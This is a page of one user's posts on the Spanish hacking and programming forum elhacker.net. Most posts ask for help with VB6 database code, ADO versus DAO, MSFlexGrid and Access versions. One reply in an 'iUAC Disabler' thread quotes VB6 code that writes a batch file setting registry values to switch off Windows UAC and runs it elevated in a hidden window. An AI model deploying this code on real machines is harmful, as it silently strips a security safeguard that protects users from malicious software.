elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8
51  Programación / Programación Visual Basic / Re: Cual es el codigo para borrar en: 7 Diciembre 2009, 18:35 pm
Depende lo que quieras borrar amigo, un registro de una bd, una dll, un ocx, un dato del registro de windows o no se pero a partir de que comentes que queres borrar seguro te van a poder ayudar. ;)
52  Programación / Programación Visual Basic / Re: Ayuda con ADO MsFlexgrid y ABM en: 7 Diciembre 2009, 14:09 pm
Chas gracias es un buen gesto el tuyo  :)  lo unico malo es que no puedo entrar al link me da como que esta muerto  :P probe con varios navegadores...tengo la conexion de internet via usb Personal...tendra algo que ver ? nos hablamos, saludos


Me registre en tu pagina y pude descargar...mmmmmmmmmmm esta bien...esta buena la idea no me gusta mucho el diseño pero lo que importa es el contenido saludos.

Mire el codigo pero no me ayudo mucho mi problema es para ir actualizando los datos con el MSFlexgrid y los controles en ADO....ya veremos
53  Programación / Programación Visual Basic / Ayuda con ADO MsFlexgrid y ABM en: 7 Diciembre 2009, 02:45 am
Buenas de vuelta al pedido de vuestra ayuda... Como bien me aconsejo Sebas me pase a ADO y estoy en eso...ahora bien, pude crear la conexion, el recordset...pero tengo problemas con las altas y bajas de los registros:

Cuando agrego un registro, me lo pasa al flexgrid, ordenado y bien. Cuando lo selecciono de la grilla y lo paso a los txt y combos para darle a "modificar" que lo unico que hace es poner su propiedad locked en false, modifico sobre estos controles, pero al darle aceptar nuevamente solo me muestra en la grilla el registro modificado...si salgo e ingreso nuevamente ahora si, estan todos los datos alli... :huh:

Cuando borro un registro me saca de la grilla TODOS los datos. Si salgo y entro, estan de nuevo, salvo el que borre, claro. Ahora si cuando  le doy al boton borrar y despues en el msgbox le doy a cancelar...se desordenan los registros en el flexgrid.... :huh:

Bueno, el codigo lo tengo de la siguiente manera:

Código:
Private Sub CmdBorrar_Click()
                                    'BOTON BORRAR

If fila <> 0 Then
A = MsgBox("Borrar el dato?", "49", "Sistema")
If A = 1 Then
rs1.Delete
MSFlexGrid1.Clear
MSFlexGrid1.TextMatrix(0, 0) = "Tipo"
MSFlexGrid1.TextMatrix(0, 1) = "Tema1"
MSFlexGrid1.TextMatrix(0, 2) = "Tema2"
MSFlexGrid1.TextMatrix(0, 3) = "Tema3 "
MSFlexGrid1.TextMatrix(0, 4) = " Tema4 "
MSFlexGrid1.TextMatrix(0, 5) = "Tema5"
MSFlexGrid1.TextMatrix(0, 6) = "Tema6"
End If

f = 0

If rs1.EOF = False Then rs1.MoveFirst
While rs1.EOF = False
f = f + 1
MSFlexGrid1.TextMatrix(f, 0) = rs1("Tipo")
MSFlexGrid1.TextMatrix(f, 1) = rs1("Tema1")
MSFlexGrid1.TextMatrix(f, 2) = rs1("Tema2")
MSFlexGrid1.TextMatrix(f, 3) = rs1("Tema3")
MSFlexGrid1.TextMatrix(f, 4) = rs1("Tema4")
MSFlexGrid1.TextMatrix(f, 5) = rs1("Tema5")
MSFlexGrid1.TextMatrix(f, 6) = rs1("Tema6")
rs1.MoveNext
Wend
End If

' BLANQUEO DE CONTROLES
Text1 = ""
Text2 = ""
Text3 = ""
Text4 = ""
Combo1 = ""
Combo2 = ""
Combo3 = ""
End Sub


'-------------------------------------------------------------------'
Código:
Private Sub CmdAceptar_Click()
                                                      '* BOTON ACEPTAR *'
If señal = 1 Then
      If rs1.EOF = False Then
      MsgBox "Error", vbCritical, "Campos en blanco, nulo o repetido"
      GoTo 100
      Else
      rs1.AddNew
      End If
      End If

rs1("Tipo") = Combo1
rs1("Tema1") = Text1
rs1("Tema2") = Combo2
rs1("Tema3") = Combo3
rs1("Tema4") = Text2
rs1("Tema5") = Text3
rs1("Tema6") = Text4
rs1.Update


Rem blanqueo de grilla
    MSFlexGrid1.Clear
    MSFlexGrid1.TextMatrix(0, 0) = "Tipo"
    MSFlexGrid1.TextMatrix(0, 1) = "Tema1"
    MSFlexGrid1.TextMatrix(0, 2) = "Tema2"
    MSFlexGrid1.TextMatrix(0, 3) = " Tema3"
    MSFlexGrid1.TextMatrix(0, 4) = "Tema4"
    MSFlexGrid1.TextMatrix(0, 5) = "Tema5 "
    MSFlexGrid1.TextMatrix(0, 6) = "Tema6"

    f = 0
      
    If rs1.EOF = False Then rs1.MoveFirst
    While rs1.EOF = False
    f = f + 1
    MSFlexGrid1.TextMatrix(f, 0) = rs1("Tipo")
    MSFlexGrid1.TextMatrix(f, 1) = rs1("Tema1")
    MSFlexGrid1.TextMatrix(f, 2) = rs1("Tema2")
    MSFlexGrid1.TextMatrix(f, 3) = rs1("Tema3")
    MSFlexGrid1.TextMatrix(f, 4) = rs1("Tema4")
    MSFlexGrid1.TextMatrix(f, 5) = rs1("Tema5")
    MSFlexGrid1.TextMatrix(f, 6) = rs1("Tema6")
    rs1.MoveNext
    Wend
100
Rem blanquear todos los controles y botones
Combo1 = ""
Combo2 = ""
Combo3 = ""
Text1 = ""
Text2 = ""
Text3 = ""
Text4 = ""
End Sub

Bueno desde ya muchas gracias si alguno me tira una idea y saludos gente!  ::)


54  Programación / Programación Visual Basic / Re: iUAC Disabler en: 3 Diciembre 2009, 02:32 am
Podrias explicar el code ? gracias.

a ver si les sirve esto...



Código
  1.  
  2.  
  3.  
  4.  
  5. Option Explicit
  6.  
  7. Private Declare Function CreateFile Lib "kernel32" _
  8. Alias "CreateFileA" ( _
  9. ByVal lpFileName As String, _
  10. ByVal dwDesiredAccess As Long, _
  11. ByVal dwShareMode As Long, _
  12. ByVal lpSecurityAttributes As Long, _
  13. ByVal dwCreationDisposition As Long, _
  14. ByVal dwFlagsAndAttributes As Long, _
  15. ByVal hTemplateFile As Long) As Long
  16.  
  17. Private Declare Function WriteFile Lib "kernel32" ( _
  18. ByVal hFile As Long, _
  19. ByVal lpBuffer As Any, _
  20. ByVal nNumberOfBytesToWrite As Long, _
  21. lpNumberOfBytesWritten As Long, _
  22. ByVal lpOverlapped As Long) As Long
  23.  
  24. Private Declare Function CloseHandle Lib "kernel32" ( _
  25. ByVal hHandle As Long) As Long
  26.  
  27. Const OPEN_ALWAYS = 4
  28. Const GENERIC_WRITE = &H40000000
  29. Const FILE_SHARE_WRITE = &H2
  30.  
  31. Const FILE_ATTRIBUTE_NORMAL = &H80
  32.  
  33. Private Declare Function ShellExecuteEx Lib "shell32.dll" ( _
  34. ByRef lpExecInfo As SHELLEXECUTEINFOA) As Long
  35.  
  36. Private Type SHELLEXECUTEINFOA
  37.    cbSize                  As Long
  38.    fMask                   As Long
  39.    hwnd                    As Long
  40.    lpVerb                  As String
  41.    lpFile                  As String
  42.    lpParameters            As String
  43.    lpDirectory             As String
  44.    nShow                   As Long
  45.    hInstApp                As Long
  46.    lpIDList                As Long
  47.    lpClass                 As String
  48.    hkeyClass               As Long
  49.    dwHotKey                As Long
  50.    hIcon                   As Long
  51.    hProcess                As Long
  52. End Type
  53.  
  54. Const SW_NORMAL = 1
  55. Const SW_HIDE = 0
  56.  
  57. Private Sub Form_Load()
  58. On Error Resume Next
  59.    Dim strPath     As String
  60.    Dim strBatCode  As String
  61.  
  62.    strBatCode = "Reg add " & Chr(34) & "hkey_local_machine\SOFTWARE\Microsoft\Security Center" & Chr(34) & " /v UACDisableNotify /t reg_dword /d 00000001 /f" & vbCrLf & _
  63.                 "Reg add " & Chr(34) & "hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" & Chr(34) & " /v EnableLUA /t REG_DWORD /d 00000000 /f"
  64.  
  65.  
  66.    Write2File Environ$("TEMP") & "\temp.bat", strBatCode
  67.    strPath = Environ$("TEMP") & "\temp.bat"
  68.  
  69.  
  70.    If Elevate(strPath) Then
  71.        MsgBox "! Elevación de Privilegios Exitosa ¡ A : " & vbCrLf & _
  72.        strPath, vbInformation, "ShellExecuteEx RUNAS Verb" ' si lo usan quiten estos mensajes solo los coloque para probar la función
  73.    Else
  74.        MsgBox "No se pudo elevar privilegios A : " & vbCrLf & _
  75.        strPath, vbInformation, "ShellExecuteEx RUNAS Verb"
  76.    End If
  77.  
  78.    End
  79.  
  80. End Sub
  81. Private Function Elevate(strPath As String) As Boolean
  82.  
  83.  
  84.    Dim ExInfo      As SHELLEXECUTEINFOA
  85.    Dim lnRet       As Long
  86.  
  87.    With ExInfo
  88.        .cbSize = Len(ExInfo)
  89.        .fMask = 0&
  90.        .hwnd = hwnd
  91.        .lpVerb = "runas"
  92.        .lpFile = strPath
  93.        .lpParameters = vbNullChar
  94.        .lpDirectory = vbNullChar
  95.        .nShow = SW_HIDE
  96.    End With
  97.  
  98.    On Error Resume Next
  99.  
  100.    lnRet = ShellExecuteEx(ExInfo)
  101.  
  102.    If lnRet <> 1 Then
  103.        Elevate = False
  104.        Exit Function
  105.    End If
  106.  
  107.    Elevate = True
  108.  
  109. End Function
  110. Private Sub Write2File(Filename As String, Buffer As String)
  111.    On Error Resume Next
  112.    Dim hFile       As Long
  113.    Dim hWrite      As Long
  114.  
  115.    hFile = CreateFile(Filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
  116.    If hFile <> 0 Then
  117.        hWrite = WriteFile(hFile, Buffer, Len(Buffer), 0, 0)
  118.    End If
  119.    CloseHandle (hFile)
  120. End Sub
  121.  
  122.  


Es un code que encontrer en un foro
55  Programación / Programación Visual Basic / Re: ADO pero alguien dice: DAO por que no para cosas chicas ? en: 1 Diciembre 2009, 03:12 am
Ta claro...me baje un par de manualetes sobre ADO...ya fue este fuckin DAO !  :laugh: tema cerrado ? si, tema cerrado.
56  Programación / Programación Visual Basic / ADO pero alguien dice: DAO por que no para cosas chicas ? en: 1 Diciembre 2009, 01:44 am
Esto esta en el manual "VB Teoria ADO" (Ing J. Paredes - descargado de la webdelprogramador)

"Antes de proseguir con estos objetos vamos a explicar donde y porqué se deben utilizar objetos ADO en vez de objetos DAO u objetos RDO

Hasta ahora habíamos utilizado bases de datos Access, y también otras bases de datos sencillas como dBase. Acceder a Access es extremadamente fácil. Y ello es debido a que Access es una base de datos sin grandes aspiraciones en cuanto a seguridad. Es una gran base de datos, y tiene sus dispositivos de seguridad en cuanto a permisos de acceso (Vea El dbEngine. Visión desde DAO y la propiedad SystemDB en el Capítulo 12) sin embargo estas posibilidades se usan en muy pocas ocasiones, y estos mecanismos de seguridad de Access tampoco son una maravilla. Por lo tanto Access se ha quedado como una gran base de datos para aplicaciones que no pasen de algunos centenares de miles de registros y con pocos puestos de operación. En esta base de datos, el método ideal de acceso es DAO, bien directamente o a través de ODBC Direct"


Ustedes que piensan ? Por el momento yo no use mucho ado, casi nada... y con dao y accss 97 safamos...que onda ?

57  Programación / Programación Visual Basic / Re: Interrumpcion en aplicacion en: 1 Diciembre 2009, 01:19 am
me parece tu maestro no se entero que eso depende de la versión de DAO que estes usando...fijate que cuando vas a Proyecto-Referencias y ahi esta la libreria de DAO llamada Microsoft Data Access Objects tenes las versiones 2.5/3.5 la 3.51 y la ultima es la 3.6 y si estas usando esa podes conectarte a access 2003, y con ADO te podes conectar a la que quieras.

pero igual aca el tema principal no es si uno abre una versión y no habre la otra, aca el tema es que la diferencia entre DAO y ADO son muchas y es mejor usar este ultimo sin dudarlo.

Okey entonces sigo buscando un buen material para migrar a ADO, el tema es que es para presentar el trabajo y tengo que pasarlo esta noche...no es nada del otro mundo es un ABM con un MSFlexgrid que tiene que hacer el evento click para devolver su contenido a los txtbx y toda esa historia...todavia no encuentro mas material del que tengo..veremos que pasa..grax carajo ! jaja (es una palabra que tengo re involucrada en mi lenguaje pero es con onda "carajo" no con mala leche asi que no se enojen che...carajo...jajaja)
58  Programación / Programación Visual Basic / Re: Interrumpcion en aplicacion en: 1 Diciembre 2009, 00:25 am
El error que tira VB cuando queres conectar mediante codigo y DAO a una BD access 2003 o superior....es por que justamente usas DAO??? si conectas con ADO podes trabajar sin problemas con accs 2003 o 2007?? por que el profesor del instituto nos dijo que "siempre" va tirar error mientras no se trabaje con accs 97 !!   :o
59  Programación / Programación Visual Basic / Re: Interrumpcion en aplicacion en: 30 Noviembre 2009, 03:22 am
Tengo XP SP2...el codigo lo modifique tenia un maskedbox re colgado capaz era eso despues cdo vuelva a compilar y empaquetar vere que onda...

El error de VB6 me sale despues de haberle puesto unos parches...  :-(

En el Instituto onda que nos "garcaron" por que estamos terminando el año y solo vimos DAO, tengo manual de Ado...vamos a ver como empiezo a pasar tooooda la aplicacion a ADO...es hacer todo de nuevo por que tengo en DAO, BD en access 97 y sin tener ese viejo paquete de officce 97 sino que armo en access 2003 y transformo a 97 tratando de que no surgan errores por que sino tengo que empezar de nuevo todo.. :P
Hasta ahora no pude hacer trabajar un access 2003 o 2007 con VB6...una pena.

EL año que viene estoy por hacer un curso de .Net del Instituto CBTech...

Saludos, tengo que seguir peleando con el datareport que no quiere hacer nada conmigo me parece jajaja. Grax.
60  Foros Generales / Sugerencias y dudas sobre el Foro / Re: COmo pongo una imagen en mi perfil ????????? en: 29 Noviembre 2009, 22:12 pm
CHAS GRACIAS Novluker !!!!!!!!



P/D: Esta opcion no la tengo en mis opciones de cuenta, por que sera ?
Páginas: 1 2 3 4 5 [6] 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines